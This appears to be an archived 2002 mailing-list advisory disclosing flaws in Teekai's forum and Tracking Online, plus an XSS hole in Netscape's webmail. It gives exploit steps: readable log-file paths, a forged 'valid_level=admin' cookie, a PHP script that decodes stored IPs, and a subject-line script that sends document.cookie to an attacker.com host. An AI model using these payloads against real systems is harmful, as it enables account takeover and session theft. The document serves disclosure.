('binary' encoding is not supported, stored as-is) Hi :) Products : ********** Tracking Online 1.0 Teekai's forum full 1.2 http://www.teekai.info Problems : ********** Tracking Online & Teekai's forum : - Informations recovery - Informations decoding Teekai's forum : - Admin access - small holes Tracking Online : -XSS Exploits : ********** Forum & Tracking : - Php file to decode informations : <? $cryptedip = explode('.',$cryptedip); $key = md5("20"); $trueip = $cryptedip[0]/$key.".".$cryptedip[1]/$key.".".$cryptedip[2]/ $key.".".$cryptedip[3]/$key; echo "Result : $trueip"; ?> Forum : - /data/member_log.txt - Setcookie "valid_level=admin" - Setcookie "valid_username_online=[VALUE e.g. JScript ]" - ... Tracking Online : - /data/userlog/log.txt - /userlog.php - ... More details in french : http://www.ifrance.com/kitetoua/tuto/Teekai.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com% 2Fkitetoua%2Ftuto%2FTeekai.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII There is a security hole in the mail service that Netscape proposes ( http://ncmail.netscape.com ). It's making it possible to inject HTML in an e-mail... and this service authenticates by the cookies. The hole consists in sending a mail with for subject a jscript preceded by : ";</script*> . The idea would be a script of this kind on subject : ";</script*><form name=a*><input name=o value=http://www.attacker.com/script?*></form*><script*>window.open (document.a.o.value+document.cookie)</script*> without '*'. I use <form> because " and ' are replaced by \" or \'. Vendors were informs but did not repair. Maybe more details soon... Sorry for my poor english. frog-m@n
This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 13:42:11 PDT